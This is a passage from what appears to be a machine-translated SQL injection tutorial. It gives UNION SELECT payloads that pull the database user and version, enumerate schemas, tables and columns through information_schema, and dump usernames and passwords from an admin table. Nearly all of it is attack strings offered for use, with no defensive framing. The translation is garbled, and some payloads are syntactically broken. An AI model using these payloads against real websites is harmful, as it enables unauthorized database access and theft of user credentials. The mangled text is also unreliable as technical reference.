And 1 = 2 union select 1, 2, 3, CONCAT_WS (CHAR (, 32), user (), database (), version /*
2. Check the database
And 1 = 2 union select 1, SCHEMA_NAME, 3, 4, 5, 6, 7, 8 from information_schema.SCHEMATA limit/* limit increases progressively from 0. When 3 is found, the browser returns an error, it indicates that two databases exist.
Iii. Violence table
And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8 from information_schema.TABLES where TABLE_SCHEMA = library hexadecimal code limit 1, 1 /*
The limit increases progressively from 0. When the browser returns an error when the query reaches 14, it indicates that the inventory is in 13 Tables.
4. Violent Fields
And 1 = 2 union select 1, 2, 3, COLUMN_NAME, 4, 5, 6, 7, 8 from information_schema.COLUMNS where TABLE_NAME = hexadecimal code of the table limit 1, 1 /*
Limit increments from 0, and the browser returns an error when querying, indicating that www.2cto.com has N-1 columns in this table.
V. Violent data
And 1 = 2 union select 1, 2, 3, name, 5, password, 7, 8 from web. ad_user /*
Here, the plaintext password is exposed. Most of the time we encounter the ciphertext after MD5 encryption.